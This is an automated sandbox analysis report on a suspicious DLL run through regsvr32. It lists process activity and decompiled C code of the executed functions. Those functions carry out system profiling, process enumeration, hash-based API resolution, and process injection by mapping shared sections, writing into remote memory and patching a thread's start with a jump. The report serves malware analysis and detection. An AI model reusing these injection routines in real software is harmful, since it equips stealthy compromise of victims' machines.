MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:20
Start date:25/09/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:22
Start date:25/09/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:0x7ff674450000
File size:24064 bytes
MD5 hash:D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:22
Start date:25/09/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:0x1320000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:10:23:28
Start date:25/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660
Imagebase:0x1c0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:10:25:00
Start date:25/09/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:0x7ff674450000
File size:24064 bytes
MD5 hash:D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:10:25:00
Start date:25/09/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Imagebase:0x1320000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:10:25:02
Start date:25/09/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 652
Imagebase:0x1c0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 86%
    			E1000D02A(void* __fp0) {
    				char _v8;
    				char _v12;
    				char _v16;
    				struct _SYSTEM_INFO _v52;
    				char _v180;
    				char _v692;
    				char _v704;
    				char _v2680;
    				void* __esi;
    				struct _OSVERSIONINFOA* _t81;
    				intOrPtr _t83;
    				void* _t84;
    				long _t86;
    				intOrPtr* _t88;
    				intOrPtr _t90;
    				intOrPtr _t91;
    				intOrPtr _t92;
    				int _t98;
    				intOrPtr _t103;
    				char* _t105;
    				void* _t108;
    				intOrPtr _t111;
    				char _t115;
    				signed int _t117;
    				char _t119;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t130;
    				intOrPtr _t134;
    				intOrPtr _t145;
    				intOrPtr _t147;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t154;
    				signed int _t159;
    				struct HINSTANCE__* _t162;
    				short* _t164;
    				intOrPtr _t167;
    				WCHAR* _t168;
    				char* _t169;
    				intOrPtr _t181;
    				intOrPtr _t200;
    				void* _t215;
    				char _t218;
    				void* _t219;
    				char* _t220;
    				struct _OSVERSIONINFOA* _t222;
    				void* _t223;
    				int* _t224;
    				void* _t241;
    
    				_t241 = __fp0;
    				_t162 =  *0x1001e69c; // 0x10000000
    				_t81 = E100085EA(0x1ac4);
    				_t222 = _t81;
    				if(_t222 == 0) {
    					return _t81;
    				}
    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
    				_t83 =  *0x1001e684; // 0x306f878
    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
    				_t3 = _t222 + 0x648; // 0x648
    				E1001230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
    				_t5 = _t222 + 0x1644; // 0x1644
    				_t216 = _t5;
    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
    				_t227 = _t86;
    				if(_t86 != 0) {
    					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FA4(_t216, _t227);
    				}
    				GetCurrentProcess();
    				_t88 = E1000B9EB(); // executed
    				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
    				_t178 =  *_t88;
    				if(E1000BB73( *_t88) == 0) {
    					_t90 = E1000BA48(_t178, _t222); // executed
    					__eflags = _t90;
    					_t181 = (0 | _t90 > 0x00000000) + 1;
    					__eflags = _t181;
    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
    				} else {
    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
    				}
    				_t12 = _t222 + 0x220; // 0x220, executed
    				_t91 = E1000E3FC(_t12); // executed
    				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
    				_t92 = E1000E3C1(_t12); // executed
    				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
    				_push( &_v16);
    				 *(_t222 + 0x224) = _t162;
    				_push( &_v8);
    				_v12 = 0x80;
    				_push( &_v692);
    				_v8 = 0x100;
    				_push( &_v12);
    				_t22 = _t222 + 0x114; // 0x114
    				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
    				_push(0); // executed
    				if(GetLastError() == 0) {
    					GetLastError();
    				}
    				_t98 = GetSystemMetrics(0x1000);
    				_t26 = _t222 + 0x228; // 0x228
    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
    				GetLastError();
    				_t31 = _t222 + 0x228; // 0x228
    				 *((intOrPtr*)(_t222 + 0x434)) = E10008FA4(_t31, _t98);
    				_t34 = _t222 + 0x114; // 0x114, executed
    				_t103 = E1000B78E(_t34,  &_v692);
    				_t35 = _t222 + 0xb0; // 0xb0
    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
    				_push(_t35);
    				E1000B663(_t103, _t35, _t98, _t241);
    				_t37 = _t222 + 0xb0; // 0xb0
    				_t105 = _t37;
    				_t38 = _t222 + 0xd0; // 0xd0
    				_t164 = _t38;
    				if(_t105 != 0) {
    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
    					if(_t159 > 0) {
    						_t164[_t159] = 0;
    					}
    				}
    				_t41 = _t222 + 0x438; // 0x438
    				_t42 = _t222 + 0x228; // 0x228
    				E10008FBE(_t42, _t41);
    				_t43 = _t222 + 0xb0; // 0xb0
    				_t108 = E1000D40B(_t43, E1000C384(_t43), 0);
    				_t44 = _t222 + 0x100c; // 0x100c
    				E1000B870(_t108, _t44, _t241);
    				_t199 = GetCurrentProcess(); // executed
    				_t111 = E1000BBC5(_t110); // executed
    				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
    				memset(_t222, 0, 0x9c);
    				_t224 = _t223 + 0xc;
    				_t222->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t222);
    				_t167 =  *0x1001e684; // 0x306f878
    				_t115 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
    					_t115 = _v8;
    				}
    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
    				if(_t115 == 0) {
    					GetSystemInfo( &_v52);
    					_t117 = _v52.dwOemId & 0x0000ffff;
    				} else {
    					_t117 = 9;
    				}
    				_t54 = _t222 + 0x1020; // 0x1020
    				_t168 = _t54;
    				 *(_t222 + 0x9c) = _t117;
    				GetWindowsDirectoryW(_t168, 0x104);
    				_t119 = E100095C7(_t199, 0x10c);
    				_t200 =  *0x1001e684; // 0x306f878
    				_t218 = _t119;
    				 *_t224 = 0x104;
    				_push( &_v704);
    				_push(_t218);
    				_v8 = _t218;
    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
    					_t154 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
    				}
    				E100085BB( &_v8);
    				_t124 =  *0x1001e684; // 0x306f878
    				_t61 = _t222 + 0x1434; // 0x1434
    				_t219 = _t61;
    				 *_t224 = 0x209;
    				_push(_t219);
    				_push(L"USERPROFILE");
    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
    					E10009626(_t219, 0x105, L"%s\\%s", _t168);
    					_t152 =  *0x1001e684; // 0x306f878
    					_t224 =  &(_t224[5]);
    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
    				}
    				_push(0x20a);
    				_t64 = _t222 + 0x122a; // 0x122a
    				_t169 = L"TEMP";
    				_t127 =  *0x1001e684; // 0x306f878
    				_push(_t169);
    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
    					_t149 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
    				}
    				_push(0x40);
    				_t220 = L"SystemDrive";
    				_push( &_v180);
    				_t130 =  *0x1001e684; // 0x306f878
    				_push(_t220);
    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
    					_t147 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
    				}
    				_v8 = 0x7f;
    				_t72 = _t222 + 0x199c; // 0x199c
    				_t134 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
    				_t75 = _t222 + 0x100c; // 0x100c
    				E1001230C(E1000D40B(_t75, E1000C384(_t75), 0),  &_v2680);
    				_t76 = _t222 + 0x1858; // 0x1858
    				E100122DE( &_v2680, _t76, 0x20);
    				_t79 = _t222 + 0x1878; // 0x1878
    				E10009013(1, _t79, 0x14, 0x1e,  &_v2680);
    				_t145 = E1000CD3E(_t79); // executed
    				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
    				return _t222;
    			}

    APIs
      • Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    • GetCurrentProcessId.KERNEL32 ref: 1000D051
    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D08D
    • GetCurrentProcess.KERNEL32 ref: 1000D0AA
    • GetLastError.KERNEL32(00000000,?,00000114,00000080,?,?,?), ref: 1000D13C
    • GetLastError.KERNEL32 ref: 1000D149
    • GetSystemMetrics.USER32(00001000), ref: 1000D155
    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D177
    • GetLastError.KERNEL32 ref: 1000D17D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1D2
    • GetCurrentProcess.KERNEL32 ref: 1000D219
      • Part of subcall function 1000BA48: CloseHandle.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC
    • memset.MSVCRT ref: 1000D234
    • GetVersionExA.KERNEL32(00000000), ref: 1000D23F
    • GetCurrentProcess.KERNEL32(00000100), ref: 1000D259
    • GetSystemInfo.KERNEL32(?), ref: 1000D275
    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D292
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CurrentProcess$ErrorLast$FileModuleNameSystem$AllocByteCharCloseDirectoryHandleHeapInfoMetricsMultiVersionWideWindowsmemset
    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
    • API String ID: 385003945-2706916422
    • Opcode ID: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
    • Instruction ID: 5888c9f6af661bcb9cc61cc2503a615177fd6cb5ab4d5a94d274bd65592933d8
    • Opcode Fuzzy Hash: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
    • Instruction Fuzzy Hash: 7DB15A75600709AFE714EB74CC89FEA77E8EF18380F01482EF55AD7195EB70AA448B21
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E1000C6CB(void* __ecx, intOrPtr __edx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				long _v24;
    				long _v28;
    				void* _v32;
    				intOrPtr _v36;
    				long _v40;
    				void* _v44;
    				char _v56;
    				char _v72;
    				struct _WNDCLASSEXA _v120;
    				void* _t69;
    				intOrPtr _t75;
    				struct HWND__* _t106;
    				intOrPtr* _t113;
    				struct _EXCEPTION_RECORD _t116;
    				void* _t126;
    				void* _t131;
    				intOrPtr _t134;
    				void* _t140;
    				void* _t141;
    
    				_t69 =  *0x1001e688; // 0x2ff04a0
    				_t126 = __ecx;
    				_t134 = __edx;
    				_t116 = 0;
    				_v36 = __edx;
    				_v16 = 0;
    				_v44 = 0;
    				_v40 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = __ecx;
    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
    					E1000E249(0x1f4);
    					_t116 = 0;
    				}
    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
    				_v28 = _t116;
    				if( *_t113 != 0x4550) {
    					L12:
    					if(_v8 != 0) {
    						_t75 =  *0x1001e780; // 0x306f9a0
    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
    						_v8 = _v8 & 0x00000000;
    					}
    					L14:
    					if(_v12 != 0) {
    						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
    					}
    					if(_v16 != 0) {
    						NtClose(_v16);
    					}
    					return _v8;
    				}
    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
    				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
    					goto L12;
    				}
    				_v120.style = 0xb;
    				_v120.cbSize = 0x30;
    				_v120.lpszClassName =  &_v56;
    				asm("movsd");
    				_v120.lpfnWndProc = DefWindowProcA;
    				asm("movsd");
    				asm("movsd");
    				asm("movsb");
    				asm("movsd");
    				asm("movsd");
    				asm("movsw");
    				asm("movsb");
    				_v120.cbWndExtra = 0;
    				_v120.lpszMenuName = 0;
    				_v120.cbClsExtra = 0;
    				_v120.hInstance = 0;
    				if(RegisterClassExA( &_v120) != 0) {
    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
    					if(_t106 != 0) {
    						DestroyWindow(_t106);
    						UnregisterClassA( &_v56, 0);
    					}
    				}
    				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
    					_t126 = _v20;
    					goto L12;
    				} else {
    					_t126 = _v20;
    					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
    						goto L12;
    					}
    					_t140 = E1000864F( *0x1001e688, 0x1ac4);
    					_v32 = _t140;
    					if(_t140 == 0) {
    						goto L12;
    					}
    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
    					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
    					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
    					E10008600( &_v32, 0x1ac4);
    					_t141 =  *0x1001e688; // 0x2ff04a0
    					 *0x1001e688 = _t131;
    					E100086C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
    					E1000C64A(_v12, _v8, _v36);
    					 *0x1001e688 = _t141;
    					goto L14;
    				}
    			}

    APIs
    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
    • RegisterClassExA.USER32(00000030), ref: 1000C790
    • CreateWindowExA.USER32 ref: 1000C7BB
    • DestroyWindow.USER32(00000000), ref: 1000C7C6
    • UnregisterClassA.USER32 ref: 1000C7D1
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7ED
    • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7F7
    • NtMapViewOfSection.NTDLL(?,1000CBAB,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C81E
    • VirtualAllocEx.KERNELBASE(1000CBAB,00000000,00001AC4,00001000,00000004), ref: 1000C861
    • WriteProcessMemory.KERNELBASE(1000CBAB,00000000,00000000,00001AC4,?), ref: 1000C87A
      • Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646
    • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8E6
    • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8ED
    • NtClose.NTDLL(00000000), ref: 1000C900
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
    • API String ID: 2002808388-2319545179
    • Opcode ID: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
    • Instruction ID: d4ed6399113d3519698ced96f191084217c42ad0747b1462dfeddcfc8903a4cc
    • Opcode Fuzzy Hash: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
    • Instruction Fuzzy Hash: 49713971900259AFEB11CF95CC88EAFBBB9FF49740F214469F605A7290D770AE04CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000CB82(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
    				long _v8;
    				long _v12;
    				void* _v16;
    				intOrPtr _v23;
    				void _v24;
    				long _v28;
    				struct _CONTEXT _v744;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t32;
    				intOrPtr _t33;
    				intOrPtr _t35;
    				void* _t39;
    				void* _t63;
    				long _t65;
    				void* _t70;
    				void** _t73;
    				void* _t74;
    
    				_t73 = __edx;
    				_t63 = __ecx;
    				_t74 = 0;
    				if(E1000C4D9(__ecx, __edx, __edx, 0) != 0) {
    					_t39 = E1000C6CB( *((intOrPtr*)(__edx)), _a4); // executed
    					_t74 = _t39;
    					if(_t74 != 0) {
    						memset( &_v744, 0, 0x2cc);
    						_v744.ContextFlags = 0x10002;
    						if(GetThreadContext(_t73[1],  &_v744) != 0) {
    							_t70 = _v744.Eax;
    							_v12 = _v12 & 0x00000000;
    							_v24 = 0xe9;
    							_t65 = 5;
    							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
    							_v8 = _t65;
    							_v16 = _t70;
    							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v744.Eax,  &_v24, _t65,  &_v8) < 0) {
    								L6:
    								_t74 = 0;
    							} else {
    								_v28 = _v28 & 0x00000000;
    								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    				}
    				_t32 =  *0x1001e77c; // 0x0
    				if(_t32 != 0) {
    					FreeLibrary(_t32);
    					 *0x1001e77c =  *0x1001e77c & 0x00000000;
    				}
    				_t33 =  *0x1001e784; // 0x0
    				if(_t33 != 0) {
    					_t35 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
    					E10008600(0x1001e784, 0xfffffffe);
    				}
    				return _t74;
    			}

    APIs
      • Part of subcall function 1000C4D9: LoadLibraryW.KERNEL32 ref: 1000C5D1
      • Part of subcall function 1000C4D9: memset.MSVCRT ref: 1000C610
    • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E
      • Part of subcall function 1000C6CB: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
      • Part of subcall function 1000C6CB: RegisterClassExA.USER32(00000030), ref: 1000C790
      • Part of subcall function 1000C6CB: CreateWindowExA.USER32 ref: 1000C7BB
      • Part of subcall function 1000C6CB: DestroyWindow.USER32(00000000), ref: 1000C7C6
      • Part of subcall function 1000C6CB: UnregisterClassA.USER32 ref: 1000C7D1
    • memset.MSVCRT ref: 1000CBC3
    • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
    • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
    • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
    • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$ContextDestroyFreeLoadRegisterSectionThreadUnregisterWrite
    • String ID:
    • API String ID: 850789531-0
    • Opcode ID: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
    • Instruction ID: 8dc3fb5d1cfe451f8c4839fb180d38a9adec49fd8f8a3984ebf3c7f861d3db7f
    • Opcode Fuzzy Hash: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
    • Instruction Fuzzy Hash: EA311A72A04219AFFB01DFA4CD89F9EB7B8EF08390F114265E505E61A4D731DE448F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000AB89(intOrPtr __ecx, void* __edx) {
    				void* _v304;
    				void* _v308;
    				signed int _t14;
    				signed int _t15;
    				void* _t22;
    				intOrPtr _t28;
    				void* _t31;
    				intOrPtr _t33;
    				void* _t40;
    				void* _t42;
    
    				_t33 = __ecx;
    				_t31 = __edx; // executed
    				_t14 = CreateToolhelp32Snapshot(2, 0);
    				_t42 = _t14;
    				_t15 = _t14 | 0xffffffff;
    				if(_t42 != _t15) {
    					memset( &_v304, 0, 0x128);
    					_v304 = 0x128;
    					if(Process32First(_t42,  &_v304) != 0) {
    						while(1) {
    							_t22 = E1000CCCB(_t33,  &_v308, _t31); // executed
    							_t40 = _t22;
    							if(_t40 == 0) {
    								break;
    							}
    							_t33 =  *0x1001e684; // 0x306f878
    							if(Process32Next(_t42,  &_v308) != 0) {
    								continue;
    							}
    							break;
    						}
    						CloseHandle(_t42);
    						_t15 = 0 | _t40 == 0x00000000;
    					} else {
    						_t28 =  *0x1001e684; // 0x306f878
    						 *((intOrPtr*)(_t28 + 0x30))(_t42);
    						_t15 = 0xfffffffe;
    					}
    				}
    				return _t15;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABA3
    • memset.MSVCRT ref: 1000ABBC
    • Process32First.KERNEL32(00000000,?), ref: 1000ABD3
    • Process32Next.KERNEL32(00000000,?), ref: 1000AC07
    • CloseHandle.KERNELBASE(00000000), ref: 1000AC14
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
    • String ID:
    • API String ID: 1267121359-0
    • Opcode ID: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
    • Instruction ID: 12e21ce9a58b3ff76d4a50db47e98f108d0fce0e5cc8861effe551863d451460
    • Opcode Fuzzy Hash: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
    • Instruction Fuzzy Hash: 261194722047516BE310DBA8CC89E9F37DCEB863A0F560A29F514C7185EB30D8058762
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000DFB8(void* __ecx, intOrPtr __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v92;
    				intOrPtr _t41;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				void* _t56;
    				struct HINSTANCE__* _t58;
    				_Unknown_base(*)()* _t59;
    				intOrPtr _t60;
    				void* _t62;
    				intOrPtr _t63;
    				void* _t69;
    				char _t70;
    				void* _t75;
    				CHAR* _t80;
    				void* _t82;
    
    				_t75 = __ecx;
    				_v12 = __edx;
    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
    				if(_t41 == 0) {
    					L4:
    					return 0;
    				}
    				_t62 = _t41 + __ecx;
    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
    				_t47 = 0;
    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_v8 = 0;
    				_v16 = _t63;
    				if(_t63 == 0) {
    					goto L4;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t49 = E1000D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
    					_t51 = _v8;
    					if((_t49 ^ 0x218fe95b) == _v12) {
    						break;
    					}
    					_t73 = _v20;
    					_t47 = _t51 + 1;
    					_v8 = _t47;
    					if(_t47 < _v16) {
    						continue;
    					}
    					goto L4;
    				}
    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
    					return _t80;
    				} else {
    					_t56 = 0;
    					while(1) {
    						_t70 = _t80[_t56];
    						if(_t70 == 0x2e || _t70 == 0) {
    							break;
    						}
    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
    						_t56 = _t56 + 1;
    						if(_t56 < 0x40) {
    							continue;
    						}
    						break;
    					}
    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
    					if( *((char*)(_t56 + _t80)) != 0) {
    						_t80 =  &(( &(_t80[1]))[_t56]);
    					}
    					_t40 =  &_v92; // 0x6c6c642e
    					_t58 = LoadLibraryA(_t40); // executed
    					if(_t58 == 0) {
    						goto L4;
    					}
    					_t59 = GetProcAddress(_t58, _t80);
    					if(_t59 == 0) {
    						goto L4;
    					}
    					return _t59;
    				}
    			}

    APIs
    • LoadLibraryA.KERNELBASE(.dll,1000604A,0000011C,00000000), ref: 1000E088
    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E094
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .dll
    • API String ID: 2574300362-2738580789
    • Opcode ID: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
    • Instruction ID: 92068ddf64b08cb5eb3d3d525696bfeba362b6a2b2ffb4815a15ed8f4a6c1621
    • Opcode Fuzzy Hash: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
    • Instruction Fuzzy Hash: 9831F535A002999BEB54CF69C8C47AEBBF5EF44384F244469D945E7209DBB0ED82CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
    				long _v8;
    				char _v16;
    				short _v144;
    				short _v664;
    				void* _t20;
    				struct HINSTANCE__* _t23;
    				long _t24;
    				long _t25;
    				char* _t29;
    				WCHAR* _t34;
    				long _t35;
    				void* _t40;
    				void* _t52;
    				struct _SECURITY_ATTRIBUTES* _t56;
    				void* _t57;
    				intOrPtr* _t58;
    				void* _t60;
    
    				_t52 = __edx;
    				if(_a8 != 1) {
    					if(_a8 == 0) {
    						TerminateThread( *0x1001e6a8, 0);
    					}
    					L15:
    					return 1;
    				}
    				E100085D5();
    				_t20 = E100097F2( &_v16);
    				_t60 = _t52;
    				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
    					goto L15;
    				} else {
    					E10008F5E();
